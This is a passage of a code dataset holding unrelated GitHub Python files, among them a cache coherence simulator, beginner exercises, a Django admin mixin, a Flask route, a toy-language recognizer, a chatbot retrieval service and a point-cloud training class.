each cache\n \"\"\"\n for cache in caches:\n stats[cache.__class__.__name__][cache.block_size] = cache.stats\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(description=\"Cache Coherence Simulator.\", formatter_class=RawTextHelpFormatter)\n parser.add_argument(\"--noprogress\", dest=\"noprogress\", action=\"store_true\", help=\"hide the progress bar (required if printing stats)\")\n parser.add_argument(\"filename\", metavar=\"filename\", type=str, nargs=1, help=\"the trace file to process\")\n parser.add_argument(\"--msi\", dest=\"msi\", action=\"store_const\", const=MSICache, default=None, help=\"simulate the MSI protocol\")\n parser.add_argument(\"--mesi\", dest=\"mesi\", action=\"store_const\", const=MESICache, default=None, help=\"simulate the MESI protocol\")\n parser.add_argument(\"--mes\", dest=\"mes\", action=\"store_const\", const=MESCache, default=None, help=\"simulate the MES protocol\")\n parser.add_argument(\"--record\", dest=\"record\", action=\"store_true\", help=\"record statistics to a file\")\n\n args = parser.parse_args()\n caches = (args.msi, args.mesi, args.mes)\n caches = [c for c in caches if c is not None]\n if len(caches) == 0:\n sys.stderr.write(\"Please choose at least one cache.\\n\")\n sys.exit(1)\n\n with open(args.filename[0], \"r\") as f:\n trace_lines = f.readlines()\n\n block_sizes = (2, 4, 8, 16)\n stats = {}\n for cache in caches:\n if args.record:\n stats[cache.__name__] = {}\n\n for block_size in block_sizes:\n # Create an atomic bus with 4 caches\n bus = Bus(cache, 4, block_size=block_size)\n\n print(\"Processing trace with %s at block size %d...\" % (cache.__name__, block_size))\n if not args.noprogress:\n # Create a progressbar\n pbar = tqdm(total=len(trace_lines), leave=True)\n\n for line in trace_lines:\n # convert \"P0 R 2 into (0, \"R\", 2)\n line = parse_line(line)\n if not args.noprogress:\n pbar.update(1)\n\n if line: # ignore comments (which are None)\n bus.process_transaction(*line)\n\n if not args.noprogress:\n pbar.close()\n\n if args.record:\n record_stats(stats, bus.caches)\n\n if args.record:\n with open(\"stats-block_size.pkl\", \"wb\") as f:\n pickle.dump(stats, f)\n","repo_name":"mccajm/cache_coherence_simulator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"534662022","text":"#entrada\ne = 0\nvh = 10\nvhe = 20\nc = input('Código de usuário: ')\nn = float(input('Horas trabalhadas na semana: '))\n#processamento\nif n > 50 :\n e = n - 50\n n = n - e\n \nextra = e * vhe\nsalario = n * vh\ntotal = extra + salario\n\n#saida\nprint(f'Salário: R$ {salario:.2f}')\nprint(f'Extra: R$ {extra:.2f}')\nprint(f'Total a receber na semana: R$ {total:.2f}')\n","repo_name":"lggmello/algorithms_programming","sub_path":"ProgramasPython/secao6/Exercicio06.py","file_name":"Exercicio06.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"446266013","text":"import json\nimport requests\nfrom typing import List\n\nfrom unity_sds_client.unity_session import UnitySession\nfrom unity_sds_client.resources.process import Process\nfrom unity_sds_client.resources.job import Job, JobStatus\nfrom unity_sds_client.utils.http import get_headers\n\nclass ProcessService(object):\n \"\"\"\n The ProcessService class is a wrapper to Unity's Science Processing Service endpoints.\n \"\"\"\n\n def __init__(\n self,\n 
session:UnitySession,\n endpoint:str = None\n ):\n \"\"\"\n Initialize the ProcessService class.\n\n Parameters\n ----------\n session : UnitySession\n The Unity Session that will be used to facilitate making calls to the SPS endpoints.\n endpoint : str\n An endpoint URL to override the endpoint specified in the package's config.\n\n Returns\n -------\n ProcessService\n The Process Service object.\n \"\"\"\n self._session = session\n if endpoint is None:\n self.endpoint = self._session.get_service_endpoint(\"sps\", \"sps_endpoint\")\n\n def get_processes(self) -> List[Process]:\n \"\"\"\n Returns a list of processes already deployed within SPS\n \"\"\"\n\n token = self._session.get_auth().get_token()\n headers = get_headers(token)\n url = self.endpoint + \"processes\"\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n processes = []\n for process in response.json()['processes']:\n processes.append(\n Process(\n self._session,\n self.endpoint,\n process['id'],\n process['title'],\n process['abstract'],\n process['executionUnit'],\n process['immediateDeployment'],\n process['jobControlOptions'],\n process['keywords'],\n process['outputTransmission'],\n process['owsContextURL'],\n process['processVersion']\n )\n )\n\n return processes\n \n \n def get_process(self, process_id:str) -> Process:\n \"\"\"\n Returns a list of processes already deployed within SPS\n \"\"\"\n\n token = self._session.get_auth().get_token()\n headers = get_headers(token)\n url = self.endpoint + \"processes/{}\".format(process_id)\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n process_json = response.json()['process']\n process = Process(\n self._session,\n self.endpoint,\n process_json['id'],\n process_json['title'],\n process_json['abstract'],\n process_json['executionUnit'],\n process_json['immediateDeployment'],\n process_json['jobControlOptions'],\n process_json['keywords'],\n process_json['outputTransmission'],\n process_json['owsContextURL'],\n process_json['processVersion']\n )\n\n return process\n \n \n def get_jobs(self, process:Process):\n \n token = self._session.get_auth().get_token()\n headers = get_headers(token)\n job_url = self.endpoint + \"processes/{}/jobs\".format(process.id)\n response = requests.get(job_url, headers=headers)\n response.raise_for_status()\n\n jobs = []\n for item in response.json()['jobs']:\n jobs.append(\n Job(\n self._session,\n self.endpoint,\n process,\n item['jobID'],\n JobStatus(item['status']),\n item['inputs']\n )\n )\n\n return jobs\n \n def deploy_process(self, data):\n\n token = self._session.get_auth().get_token()\n headers = get_headers(token, {\n 'Content-type': 'application/json'\n })\n url = self.endpoint + \"processes\"\n response = requests.post(url, headers=headers, json=json.dumps(data))\n response.raise_for_status()\n\n return response","repo_name":"unity-sds/unity-py","sub_path":"unity_sds_client/services/process_service.py","file_name":"process_service.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42573500506","text":"'''\n Faça um programa que leia um ano qualquer e mostre se ele é bissexto.\n'''\n\nimport datetime\nfrom calendar import isleap\n\nano = int(input('Que ano quer analisar? 
Coloque 0 para analisar o ano atual: '))\ndata = datetime.date.today()\nano_atual = data.year\n\nif ano == 0:\n    ano = ano_atual\nif isleap(ano):\n    print('O ano {} é \\33[36mBISSEXTO\\33[m!'.format(ano))\nelse:\n    print('O ano {} não é \\33[31mBISSEXTO\\33[m!'.format(ano))\n\n# Expressao para saber se é bissexto\n# ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0","repo_name":"wallanmota/Exercicios_cursoemvideo_python","sub_path":"32.py","file_name":"32.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"4956204437","text":"#got the function definition in statement idea from Dr.Lusth and Kaleb\n# also Kaleb gave me the idea about ability to nest the function definitions\n\nfrom lexer import *\nimport sys\n\n    #throw the exceptions if the stream does not match.\n    #part of idea is from Kaleb\n\nclass GrammarSyntaxError(Exception):\n    def __init__(self, t, current):\n        self.checkType = t\n        self.lexType = current\n    def __str__(self):\n        return repr(self.checkType) + \", \" + repr(self.lexType)\n\ncurrentLexeme = None\ndef recognizer(filename):\n    l = Lexer(filename)\n#set currentLexeme to be global to track the lexeme\n    global currentLexeme\n    currentLexeme = l.lex()\n    #helper functions for recognizing\n    def check(lType):\n        return currentLexeme.type == lType\n\n    def advance():\n        global currentLexeme\n        currentLexeme = l.lex()\n\n    def match(lType):\n        matchNoAdvance(lType)\n        advance()\n\n    def matchNoAdvance(lType):\n        if not check(lType):\n            raise GrammarSyntaxError(lType, currentLexeme.type)\n\n    #Dr.Lusth reminded me through email about function Def should be define, also Kaleb gave me the implement idea.\n    def functionDef():\n        match(DEF)\n        match(ID)\n        match(OPAREN)\n        optParamsList()\n        match(CPAREN)\n        block()\n\n    def functionDefPending():\n        return check(DEF)\n\n    def optParamsList():\n        if paraListsPending():\n            paramsList()\n\n    def paraListsPending():\n        return check(ID)\n\n    def paramsList():\n        match(ID)\n        if check(COMMA):\n            match(COMMA)\n            paramsList()\n\n    def block():\n        match(OBRACE)\n        optStatementList()\n        match(CBRACE)\n\n    def optStatementList():\n        if statementListPending():\n            statementList()\n\n    def statementList():\n        statement()\n        if statementListPending():\n            statementList()\n\n    def statementListPending():\n        return statementPending()\n    \n    #updated the statement, it can describe function as statement\n    def statement():\n        if exprPending():\n            expr()\n            match(SEMICOLON)\n        elif ifStatementPending():\n            ifStatement()\n        elif whileStatementPending():\n            whileStatement()\n        elif forStatementPending():\n            forStatement()\n        elif functionDefPending():\n            functionDef()#put a function def in statement, to describe my language, Dr.lusth's email reminded me and Kaleb helped me too.\n        elif check(RETURN):\n            match(RETURN)\n            optExpr()\n            match(SEMICOLON)\n        else:\n            match(PRINT)\n            match(OPAREN)\n            optExpr()\n            match(CPAREN)\n            match(SEMICOLON)\n    \n    def statementPending():\n        return ifStatementPending() or whileStatementPending() or forStatementPending() or check(RETURN) or functionDefPending() or check(PRINT) or exprPending() \n\n    def optExpr():\n        if exprPending():\n            expr()\n\n    def expr():\n        primary()\n        if operatorPending():\n            operator()\n            expr()\n\n    def exprPending():\n        return primaryPending()\n\n    def operator():\n        if check(PLUS):\n            match(PLUS)\n        elif check(MINUS):\n            match(MINUS)\n        elif check(DIVIDEDBY):\n            match(DIVIDEDBY)\n        elif check(TIMES):\n            match(TIMES)\n        elif check(EXPO):\n            match(EXPO)\n        elif check(GREATERTHAN):\n            match(GREATERTHAN)\n        
elif check(LESSTHAN):\n match(LESSTHAN)\n elif check(MOD):\n match(MOD)\n else:\n match(EQUAL)\n\n def operatorPending():\n return check(PLUS) or check(MINUS) or check(DIVIDEDBY) or check(TIMES) or check(EXPO) or check(MOD) or check(GREATERTHAN) or check(LESSTHAN) or check(EQUAL)\n\n #from previous grammar and Got idea from Dr.Lusth's lecture\n def primary():\n if check(INTEGER):\n match(INTEGER)\n elif check(REAL):\n match(REAL)\n elif check(STRING):\n match(STRING)\n elif check(OPAREN):\n match(OPAREN)\n expr()\n match(CPAREN)\n else:\n varExpr()\n\n def primaryPending():\n return check(INTEGER) or check(REAL) or check(STRING) or check(OPAREN) or varExprPending()\n\n def varExpr():\n match(ID)\n if check(OPAREN):\n match(OPAREN)\n optArgList()\n match(CPAREN)\n\n def varExprPending():\n return check(ID)\n\n def optArgList():\n if argListPending():\n argList()\n\n def argList():\n expr()\n if check(COMMA):\n match(COMMA)\n argList()\n\n def argListPending():\n return exprPending()\n\n def ifStatementPending():\n return check(IF)\n\n def ifStatement():\n match(IF)\n expr()\n block()\n optElif()\n optElse()\n\n def optElif():\n if check(ELIF):\n match(ELIF)\n expr()\n block()\n\n def optElse():\n if check(ELSE):\n match(ELSE)\n block()\n\n def optInit():#Kaleb came up with this idea, and i borrowed it\n if check(EQUAL):\n match(EQUAL)\n expr()\n\n def whileStatementPending():\n return check(WHILE)\n\n def whileStatement():\n match(WHILE)\n expr()\n block()\n\n def forStatementPending():\n return check(FOR)\n\n#check the range function if it has a ID or INTEGER inside\n def forStatement():\n match(FOR)\n match(ID)\n match(IN)\n match(RANGE)#keyword range reminded by Kaleb \n match(OPAREN)\n if check(ID):\n match(ID)\n match(COMMA)\n if check(ID):\n match(ID)\n match(CPAREN)\n block()\n else:\n match(INTEGER)\n match(CPAREN)\n block()\n\n\n else:\n match(INTEGER)\n match(COMMA)\n if check(ID):\n match(ID)\n match(CPAREN)\n block()\n else:\n match(INTEGER)\n match(CPAREN)\n block()\n\n try:\n statementList()\t\n print('legal')\n except GrammarSyntaxError as e:\n print('illegal') \n #need to print the syntaxError\n print('GrammarSyntaxError: expected lexeme of type {c}, got type {l}'.format(c = e.checkType, l = e.lexType))#format form from Kaleb\n sys.exit(1)\n\nrecognizer(sys.argv[1])\n","repo_name":"voidsteed/LineThemUp_Language","sub_path":"module/environment/recognizer.py","file_name":"recognizer.py","file_ext":"py","file_size_in_byte":6595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43040169957","text":"# クエリ先読み\n# t == 0を先に読むことで、整数列Aの候補を作ることができる\n# 答えが一通りに定まる条件は、x <-> y にedgeを張った木について、x, yが連結であること\nimport sys\nsys.setrecursionlimit(10**6)\n\n\ndef main():\n n = int(input())\n q = int(input())\n query_list = []\n q0_list = []\n for _ in range(q):\n t, x, y, v = map(int, input().split())\n x -= 1\n y -= 1\n query_list.append((t, x, y, v))\n if t == 0:\n q0_list.append((x, y, v))\n\n # 先読み\n A = [0]*n\n q0_list.sort()\n for x, y, v in q0_list:\n # A[x] + A[y] = v\n A[y] = v - A[x]\n # print(A)\n\n # union find\n par = [i for i in range(n)]\n\n def find(x):\n if x == par[x]:\n return x\n par[x] = find(par[x])\n return par[x]\n\n def union(x, y):\n x = find(x)\n y = find(y)\n if x == y:\n return\n par[x] = y\n\n def same(x, y):\n return find(x) == find(y)\n\n for t, x, y, v in query_list:\n if t == 0:\n union(x, y)\n continue\n if same(x, y):\n # 答えが定まる場合\n real_a_x = v\n a_x = A[x]\n delta_a_x = real_a_x - a_x\n a_y = A[y]\n 
if abs(x-y) % 2 == 0:\n                sign = 1\n            else:\n                sign = -1\n            delta_a_y = sign * delta_a_x\n            real_a_y = a_y + delta_a_y\n            print(real_a_y)\n        else:\n            print('Ambiguous')\n\n\nmain()\n","repo_name":"batamorphism/coding","sub_path":"Python/AtCoder/old/typical90_bp_1226.py","file_name":"typical90_bp_1226.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"5447941726","text":"def count_char(str):\n    \"\"\"\n    counts how many times each character occurs in the string\n    \"\"\"\n    #select unique chars\n    unique_chars = set(str)\n    #create dict\n    chars_dict = {}.fromkeys(unique_chars, 0)\n    #count the occurrences of each character in the string\n    count_of_char = {x: str.count(x) for x in chars_dict}\n    return count_of_char\n\ncounted_string = input(\"Enter the counted string: \")\nprint('Calculated characters :', count_char(counted_string))\n\n\n","repo_name":"kolyasalubov/UA-12-10-23.PythonFundamentals","sub_path":"LitvischenkoYevhen/HW7.1/HW7_task_3.py","file_name":"HW7_task_3.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
+{"seq_id":"27539911044","text":"from flask import Blueprint\nfrom flask_login import current_user, login_required\n\nfrom tracking.page_handlers.specification_update_handler import SpecificationUpdateHandler\n\nspecification_bp = Blueprint(\n    'specification_bp', __name__,\n    template_folder='templates',\n    static_folder='static',\n)\n\n\n@specification_bp.route('/update//////',\n                        methods=['GET', 'POST'])\n@login_required\ndef specification_update(**kwargs):\n    return SpecificationUpdateHandler('specification_bp.specification_update', current_user, **kwargs).handle()\n","repo_name":"wahinipa/cupboard","sub_path":"www/tracking/routing/specification_routes.py","file_name":"specification_routes.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"22135763005","text":"from django.db import router\nfrom django.db.models import Q\nfrom django.contrib import messages\nfrom django.contrib.admin import helpers\nfrom django.utils.translation import gettext as _\nfrom django.contrib.admin.utils import get_deleted_objects, model_ngettext\nfrom django.core.exceptions import PermissionDenied\nfrom django.template.response import TemplateResponse\n\nfrom papermerge.core.models import BaseTreeNode\n\"\"\"\nClasses in this module are designed to overwrite respective classes in\ndjango.contrib.admin.options. These classes are meant to be mixed into the\nclass that is to be altered. The class needs to be inserted in such a way\nthat it comes before the altered class in the MRO chain.\n\"\"\"\n\n\nclass BaseModelBoss:\n    \"\"\"\n    Mixin designed to overwrite methods from\n    django.contrib.admin.options.BaseModelAdmin\n    \"\"\"\n\n    def get_field_queryset(self, db, db_field, request):\n        \"\"\"\n        If the ModelAdmin specifies ordering, the queryset should respect that\n        ordering. 
Otherwise don't specify the queryset, let the field decide\n (return None in that case).\n \"\"\"\n qs = None\n related_admin = self.admin_site._registry.get(\n db_field.remote_field.model\n )\n if related_admin is not None:\n qs = db_field.remote_field.model._default_manager.using(db)\n ordering = related_admin.get_ordering(request)\n if ordering is not None and ordering != ():\n qs = qs.order_by(*ordering)\n\n return qs\n\n def save_model(self, request, obj, form, change):\n \"\"\"\n Save model per current user.\n \"\"\"\n obj.user = request.user\n super().save_model(request, obj, form, change)\n\n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n \"\"\"\n Will show in dropdown box only folders/MPTT models of current user.\n \"\"\"\n if db_field.name == \"parent\":\n kwargs[\"queryset\"] = BaseTreeNode.objects.filter(user=request.user)\n return super().formfield_for_foreignkey(db_field, request, **kwargs)\n\n def get_actions(self, request):\n actions = super().get_actions(request)\n if actions is not None and 'delete_selected' in actions:\n actions['delete_selected'] = (\n self.delete_selected_boss,\n 'delete_selected',\n _('Delete selected %(verbose_name_plural)s'))\n return actions\n\n def delete_selected_boss(self, modeladmin, request, queryset):\n \"\"\"\n Default action which deletes the selected objects.\n\n This action first displays a confirmation page which shows all the\n deletable objects, or, if the user has no permission one of the related\n childs (foreignkeys), a \"permission denied\" message.\n\n Next, it deletes all selected objects and redirects back to the change\n list.\n \"\"\"\n opts = modeladmin.model._meta\n app_label = opts.app_label\n # Check that the user has delete permission for the actual model\n for obj in queryset:\n if not modeladmin.has_delete_permission(request, obj):\n raise PermissionDenied\n\n using = router.db_for_write(modeladmin.model)\n # Populate deletable_objects, a data structure of all related objects\n # that will also be deleted.\n deletable_objects, model_count, x, y = get_deleted_objects(\n queryset, opts, request.user, modeladmin.admin_site, using)\n\n # The user has already confirmed the deletion.\n # Do the deletion and return None to display the change list\n # view again.\n if request.POST:\n n = queryset.count()\n if n:\n for obj in queryset:\n obj_display = str(obj)\n modeladmin.log_deletion(request, obj, obj_display)\n queryset.delete()\n modeladmin.message_user(\n request, _(\"Successfully deleted %(count)d %(items)s.\") % {\n \"count\": n, \"items\": model_ngettext(modeladmin.opts, n)\n }, messages.SUCCESS)\n # Return None to display the change list page again.\n return None\n\n objects_name = model_ngettext(queryset)\n\n title = _(\"Are you sure?\")\n\n context = dict(\n modeladmin.admin_site.each_context(request),\n title=title,\n objects_name=str(objects_name),\n deletable_objects=[deletable_objects],\n model_count=dict(model_count).items(),\n queryset=queryset,\n perms_lacking=False,\n protected=False,\n opts=opts,\n action_checkbox_name=helpers.ACTION_CHECKBOX_NAME,\n media=modeladmin.media,\n )\n\n request.current_app = modeladmin.admin_site.name\n\n # Display the confirmation page\n return TemplateResponse(\n request, modeladmin.delete_selected_confirmation_template or [\n \"admin/%s/%s/delete_selected_confirmation.html\" % (\n app_label, opts.model_name\n ),\n \"admin/%s/delete_selected_confirmation.html\" % app_label,\n \"admin/delete_selected_confirmation.html\"\n ], 
context)\n","repo_name":"solidnerd/papermerge","sub_path":"papermerge/boss/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":5254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"21524933768","text":"# This script is a simple test for the following conjecture:\n\n# Let S: N -> N be the sum of the digits of a positive integer.\n# For all A and B in N, S(A + B) = S(A) + S(B) - 9k, where k is an interger.\n\nfrom time import time\n\ndef sum_digits(n: int) -> int:\n parc = abs(n)\n sum_d = 0\n\n while parc > 0:\n sum_d += parc % 10\n parc //= 10\n\n return sum_d\n\ndef get_counterexmpl(max: int) -> (int, int):\n sums = get_sums(max)\n\n for a in range(max + 1):\n for b in range(a, max + 1):\n diff = sums[a + b] - sums[a] - sums[b]\n\n if not diff % 9 == 0:\n return (a, b)\n \n return None\n\ndef get_sums(max: int) -> list:\n output = []\n\n for i in range(2 * (max + 1) + 1):\n output.append(sum_digits(i))\n\n return output\n\n\nprint(\"\\nThis script is a simple test for the following conjecture:\\n\")\nprint(\"Let S: N -> N be the sum of the digits of a positive integer.\")\nprint(\"For all A and B in N, S(A + B) = S(A) + S(B) - 9k, where k is an interger.\\n\")\nmax_str = input(\"What value would you like to test the conjecture for? \")\nprint(\"\\nLOADING. . .\")\n\ntry:\n max = int(max_str)\n if max < 0:\n raise ValueError\n\n start = time()\n counterexmpl = get_counterexmpl(max)\n elepsed = time() - start\n\n print(\"LOADED. . . in {:.0f}ms\\n\".format(elepsed * 10**3))\n\n if counterexmpl == None:\n print(\"The conjecture is proved for all natural numbers smaller or equals to {}!\".format(max))\n else:\n (a, b) = counterexmpl\n print(\"The conjecture is disproved! Here's a counterexample: ({}, {})\".format(a, b))\nexcept:\n print(\"'{}' isn't a natural number!\".format(max_str))\n","repo_name":"PixelyIon/A-Conjecture-of-Mine","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37479974836","text":"import sys\nimport math\n\n# game loop\nwhile True:\n dic = {}\n for i in range(8):\n mountain_h = int(input()) # represents the height of one mountain.\n dic[i] = mountain_h\n \n cible = max(dic, key=dic.get)\n\n print(cible)","repo_name":"ScrimaliAnthony/CodinGame","sub_path":"Algorithmes/La Descente/la_descente.py","file_name":"la_descente.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14473529257","text":"#parametric plotter with animation \r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import animation\r\nnum_steps = 100 #steps size for the animator \r\nplt.close('all')\r\nfig = plt.figure()\r\ninterval = 3 #specify the axes limits\r\nax = plt.axes(xlim=(-interval,interval),ylim = (-interval,interval))\r\n\r\n(myline,) = ax.plot([],[],lw=2) # ploter line \r\n(mypoint,) = ax.plot([],[],'ko',ms=5) # ploter pointer\r\n\r\ndef get_step(n,x,y,this_line,this_point):\r\n this_line.set_data(x[:n+1],y[:n+1])\r\n this_point.set_data(x[n],y[n])\r\n \r\ndef init():\r\n myline.set_data([],[])\r\n return myline\r\ndef animate(i):\r\n t = np.linspace(0,2*np.pi,(100*interval)/(interval+2))\r\n y = np.sin(t) #y(t)\r\n x = np.cos(t)#x(t)\r\n myline.set_data(x[:i+1],y[:i+1])\r\n mypoint.set_data(x[i],y[i])\r\n return myline\r\nanim = 
animation.FuncAnimation(fig,animate,init_func=init,frames = 2000,interval = 1)\r\n","repo_name":"FaisalAhmed0/Scientific-coding","sub_path":"parametricPlotter.py","file_name":"parametricPlotter.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24421956340","text":"#!/usr/bin/env python3\n'''\n13.01.2020 version 1.0\nproducing N random numbers with D digits:\n and append them \n start = 10^D, \n end = 10^(D+1)-1\n num = N \n'''\nimport argparse\nimport numpy as np\nimport random\nimport sys,os,shutil\n\nmy_parser = argparse.ArgumentParser(prog=\"random.py\",\n usage=\"%(prog)s -n -d [-f ] \",\n description='producing N random numbers with D digits',\n epilog=\"-n -d should assign\",\n prefix_chars=\"-\")\n\n# Execute the parse_args() method\nmy_parser.add_argument('-n', action='store', dest=\"N\", type=int, required=True,\n help=\"numbers of random number\")\nmy_parser.add_argument('-d', action='store', dest=\"D\", type=int, required=True,\n help=\"numbers of digits\") \nmy_parser.add_argument('-f', action='store', dest=\"file\", type=str, required=False,\n help=\"outfile to write to [optional]\") \n\nargs = my_parser.parse_args()\n \nN=int(args.N)\nD=int(args.D)\noutfile=args.file\n\n\n# Function to generate \nstart=int(pow(10,D-1))\nend=int(pow(10,(D)))-1\nnum = N\nprint(\"random integer between {} and {}\".format(start,end))\n#https://stackoverflow.com/questions/31742326/efficient-way-of-reading-integers-from-file\ndef read_dirs(list_dir):\n m = len(list_dir)\n list_dir = list(dict.fromkeys(list_dir))\n n = len(list_dir)\n if (m!=n): print(\"'{}' in saved', {}' duplicate(s) ignored\"\n .format(n,m-n))\n else: print(\"'{}'random numbers saved\".format(n))\n return list_dir\n\ndef checkDuplication(ListElem):\n for elem in ListElem:\n if ListElem.count(elem)>2:\n return True\n return False\n\nres = np.zeros(num)\n#res=np.chararray(num)\n\ndef Rand(start, end, num): \n for j in range(num): \n res[j] = (random.randint(start, end))\n return res \n\nif (outfile!=None):\n res=Rand(start, end, num)\n res=read_dirs(res)\n np.savetxt(outfile,[res],fmt='%d',newline=\" \")\nelse : print(Rand(start, end, num))\n","repo_name":"saeed-amiri/MYPYTHON","sub_path":"random_number.py","file_name":"random_number.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22910657769","text":"from konlpy.tag import Okt\nfrom ..utils.search import Search\nfrom library.fileHandler import Pickle\nfrom library.extract import Extract\n\nfrom ..utils.llm import Chain\nfrom ..utils.prompt import create_prompt_template\nokt = Okt()\n\nclass ChatbotService:\n def __init__(self) -> None:\n pass\n\n def get_bm25_answers(question, dataset):\n file_path = f'/Users/user/Python/bm25_bot/assets/{dataset}'\n p = Pickle(file_path)\n pkl_file = p.read_pkl()\n tokens = [v['normalized'] for v in pkl_file]\n\n question_token = Extract.tokenizer(question)\n\n top_idx, score = Search.tf_idf(question_token, tokens)\n answer_list = [{'content': pkl_file[idx]['content'], 'source': pkl_file[idx]['source'], 'score': score[idx], 'pages': pkl_file[idx]['pages']} for idx in top_idx]\n\n return answer_list\n\n def get_qdrant_answers(dataset, question):\n return Search.similaritySearch(dataset, question)\n\n def doc_to_object(docs, dataset):\n arr = []\n for doc in docs:\n arr.append({\n \"content\" : doc[0].page_content.replace('\\n', ' '),\n 
\"source\" : doc[0].metadata['source'].split('/')[-1],\n \"pages\" : str(doc[0].metadata['page']) if dataset == 'ctd_paged' else str(doc[0].metadata['pages']),\n \"score\" : str(doc[1])\n })\n return arr\n\n def chatWithLLM(bm25_answer_list, qdrant_answer_list, question):\n try:\n chat_prompt = create_prompt_template()\n info = Extract.make_pure_info(bm25_answer_list, qdrant_answer_list)\n\n return Chain.create(chat_prompt, info, question)\n except Exception as e:\n raise e","repo_name":"jumyeong33/chat_with_pdf","sub_path":"api/service/chatbotService.py","file_name":"chatbotService.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17898768120","text":"from importlib import import_module\nfrom SPConvNets import FragmentLoader, PointCloudPairSampler, Dataloader_3dmatch_eval\nfrom tqdm import tqdm\nimport torch\nimport vgtk\nimport vgtk.pc as pctk\nimport numpy as np\nimport os\nimport os.path as osp\n\nclass Trainer(vgtk.Trainer):\n def __init__(self, opt):\n super(Trainer, self).__init__(opt)\n\n if self.opt.train_loss.equi_alpha > 0:\n self.summary.register(['Loss', 'InvLoss', 'Pos', 'Neg', 'Acc', \\\n 'EquiLoss', 'EquiPos', 'EquiNeg', 'EquiAcc' ])\n else:\n self.summary.register(['Loss', 'Pos', 'Neg', 'Acc'])\n\n self.epoch_counter = 0\n self.iter_counter = 0\n\n def _setup_datasets(self):\n\n if self.opt.mode == 'train':\n dataset = FragmentLoader(self.opt, self.opt.model.search_radius, kptname=self.opt.dataset, \\\n use_normals=self.opt.model.normals, npt=self.opt.npt)\n\n sampler = PointCloudPairSampler(len(dataset))\n\n self.dataset_train = torch.utils.data.DataLoader(dataset, \\\n batch_size=self.opt.batch_size, \\\n shuffle=False, \\\n sampler=sampler,\n num_workers=self.opt.num_thread)\n self.dataset_iter = iter(self.dataset_train)\n\n\n if self.opt.mode == 'eval':\n self.dataset_train = None\n\n\n def _setup_eval_datasets(self, scene):\n dataset_eval = Dataloader_3dmatch_eval(self.opt, scene)\n self.dataset_eval = torch.utils.data.DataLoader(dataset_eval, \\\n batch_size=1, \\\n shuffle=False, \\\n num_workers=1)\n\n def _setup_model(self):\n param_outfile = osp.join(self.root_dir, \"params.json\")\n module = import_module('SPConvNets.models')\n self.model = getattr(module, self.opt.model.model).build_model_from(self.opt, param_outfile)\n\n\n def _setup_metric(self):\n self.anchors = self.model.get_anchor().to(self.opt.device)\n self.metric = vgtk.loss.TripletBatchLoss(self.opt,\\\n self.anchors,\n alpha = self.opt.train_loss.equi_alpha) \\\n\n # For epoch-based training\n def epoch_step(self):\n for it, data in tqdm(enumerate(self.dataset_train)):\n self._optimize(data)\n\n # For iter-based training\n def step(self):\n try:\n data = next(self.dataset_iter)\n except StopIteration:\n # New epoch\n self.epoch_counter += 1\n print(\"[DataLoader]: At Epoch %d!\"%self.epoch_counter)\n self.dataset_iter = iter(self.dataset_train)\n data = next(self.dataset_iter)\n self._optimize(data)\n\n\n def _prepare_input(self, data):\n in_tensor_src = data['src'].to(self.opt.device)\n in_tensor_tgt = data['tgt'].to(self.opt.device)\n nchannel = in_tensor_src.shape[-1]\n in_tensor_src = in_tensor_src.view(-1, self.opt.model.input_num, nchannel)\n in_tensor_tgt = in_tensor_tgt.view(-1, self.opt.model.input_num, nchannel)\n\n return in_tensor_src, in_tensor_tgt\n\n\n def _optimize(self, data):\n\n gt_T = data['T'].to(self.opt.device)\n\n in_tensor_src, in_tensor_tgt = 
